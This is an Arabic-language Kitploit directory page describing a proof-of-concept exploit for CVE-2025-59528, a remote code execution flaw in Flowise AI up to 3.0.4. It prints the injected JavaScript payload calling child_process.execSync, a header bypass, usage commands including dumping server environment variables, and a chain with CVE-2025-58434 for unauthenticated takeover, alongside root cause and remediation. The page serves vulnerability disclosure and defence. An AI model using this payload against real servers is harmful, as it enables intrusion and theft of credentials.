Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Flowise-RCE-CVE-2025-59528 — استغلال Python PoC لـ CVE-2025-59528، يحقق RCE موثق على Flowise AI <= 3.0.4 عبر نقطة نهاية customMCP و Node.js child_process.execSync. | Kitploit
أدوات/GitHubGitHub/arensballiu/flowise-rce-cve-2025-59528
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرتطوير الحمولات
GitHubarensballiu/flowise-rce-cve-2025-59528

Flowise-RCE-CVE-2025-59528

استغلال Python PoC لـ CVE-2025-59528، يحقق RCE موثق على Flowise AI <= 3.0.4 عبر نقطة نهاية customMCP و Node.js child_process.execSync.

عرض المستودع
11منذ 4س 37دلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-59528 — تنفيذ تعليمات برمجية عن بُعد (RCE) مُصادَق عليه في Flowise AI

نظرة عامة

معرّف CVE: CVE-2025-59528
البرنامج المتأثر: Flowise AI
الإصدارات المصابة: <= 3.0.4
الإصدار المُصلَّح: 3.0.5 وما بعده
الخطورة: حرجة
المؤلف: arensballiu
التاريخ: 2025

الوصف

تسمح إصدارات Flowise AI حتى الإصدار 3.0.4 ضمناً للمستخدم المُصادَق عليه بتحقيق تنفيذ تعليمات برمجية عن بُعد (RCE) على الخادم المضيف عبر إرسال حمولة JavaScript مُصمَّمة إلى نقطة النهاية /api/v1/node-load-method/customMCP.

تقبل طريقة التحميل الخاصة بعقدة customMCP مدخلات يتحكم بها المستخدم يتم تقييمها على جانب الخادم كـ JavaScript، دون تعقيم أو عزل كافٍ. من خلال حقن حمولة تستغل child_process.execSync في Node.js، يمكن للمهاجم تشغيل أوامر نظام تشغيل عشوائية بصلاحيات عملية خادم Flowise.

تتطلب نقطة النهاية أيضاً وجود الترويسة x-request-from: internal.

نقطة النهاية المتأثرة

نقطة النهايةالطريقةالمصادقة مطلوبةالغرض
/api/v1/auth/loginPOSTلاالمصادقة والحصول على الجلسة
/api/v1/node-load-method/customMCPPOSTنعم (ملف تعريف ارتباط الجلسة)نقطة نهاية طريقة تحميل العقدة المصابة

إثبات المفهوم

الملف: CVE-2025-59528_POC.py

المتطلبات

  • Python 3.x
  • مكتبة requests
  • بيانات اعتماد صالحة لأي حساب مستخدم على نسخة Flowise المستهدفة
root@kitploit:~
pip install requests

الاستخدام

root@kitploit:~
python3 CVE-2025-59528_POC.py -e <email> -i <target_url> -p <password> -c <command>

الوسائط

العلمالصيغة الطويلةمطلوبالوصف
-e--emailنعمعنوان البريد الإلكتروني للمستخدم المُصادَق عليه
-i--urlنعمعنوان URL الأساسي لنسخة Flowise
-p--passwordنعمكلمة مرور المستخدم المُصادَق عليه
-c--cmdنعمأمر نظام التشغيل المراد تنفيذه على الخادم

أمثلة

التحقق من تنفيذ التعليمات البرمجية:

root@kitploit:~
python3 CVE-2025-59528_POC.py -e [email protected] -i https://flowise.example.com -p MyP@ss -c "id"

استرجاع متغيرات بيئة الخادم:

root@kitploit:~
python3 CVE-2025-59528_POC.py -e [email protected] -i https://flowise.example.com -p MyP@ss -c "env"

المخرجات المتوقعة

root@kitploit:~
[+] Logged in
[+] Exploit sent
[+] Status: 200

تفصيل الحمولة

يحقن الاستغلال تعبير JavaScript التالي في الحقل mcpServerConfig:

root@kitploit:~
({x:(function(){
    const cp = process.mainModule.require('child_process');
    cp.execSync('<command>');
    return 1;
})()})
  • process.mainModule.require('child_process') — يحمّل وحدة تنفيذ العمليات المدمجة في Node.js.
  • execSync('<command>') — يشغّل بشكل متزامن أمر نظام التشغيل الذي يوفره المهاجم.
  • التعبير بأكمله مُغلَّف في كائن حرفي لضمان تقييمه بشكل نظيف داخل سياق JavaScript الخاص بالخادم.

تُضاف أيضاً الترويسة x-request-from: internal إلى الطلب لتجاوز فحص الأصل الداخلي الذي كان سيمنع الاستدعاء بخلاف ذلك.

السبب الجذري

تمرّر نقطة النهاية customMCP المدخلات التي يوفرها المستخدم مباشرةً إلى سياق تقييم JavaScript على الخادم دون تعقيم أو عزل. وبالاقتران مع الوصول غير المقيّد إلى وحدات Node.js الأساسية (تحديداً child_process) عبر process.mainModule.require، فإن هذا يخلق ناقل RCE سهل الاستغلال. لا يوفر فحص الترويسة x-request-from أي حد أمني ذي معنى لأنه لا يتم التحقق منه مقابل أي مصدر موثوق.

التسلسل مع CVE-2025-58434

يمكن تسلسل هاتين الثغرتين لمسار هجوم RCE غير مُصادَق عليه ضد نسخ Flowise التي تعمل بإصدارات <= 3.0.4:

  1. استخدم CVE-2025-58434 لإعادة تعيين كلمة مرور أي حساب معروف (دون الحاجة إلى مصادقة مسبقة).
  2. سجّل الدخول ببيانات الاعتماد المُعيَّنة حديثاً.
  3. استخدم CVE-2025-59528 لتنفيذ أوامر نظام تشغيل عشوائية على الخادم.

المعالجة

  • قم بالترقية إلى Flowise AI 3.0.5 أو أحدث، والذي يزيل أو يعزل بشكل صحيح مسار التقييم المصاب.
  • لا تقم أبداً بتقييم سلاسل نصية يتحكم بها المستخدم كتعليمات برمجية في سياق على جانب الخادم.
  • قيّد الوصول إلى وحدات Node.js الخطيرة (child_process، fs، إلخ) عبر صندوق رمل مناسب (مثل vm2، أو سياقات معزولة، أو إزالة الوصول إلى process.mainModule).
  • تحقق من الترويسة x-request-from ووثّقها عبر آلية على جانب الخادم بدلاً من فحص سلسلة نصية بسيط.
  • طبّق مبدأ الامتياز الأقل على عملية خادم Flowise.

إخلاء المسؤولية

يُقدَّم إثبات المفهوم هذا لأغراض تعليمية وبحث أمني مُصرَّح به فقط. يُعدّ استخدام هذا السكربت ضد أنظمة دون إذن كتابي صريح غير قانوني وغير أخلاقي. لا يتحمل المؤلف والمساهمون أي مسؤولية عن سوء الاستخدام.

تنزيل الأداة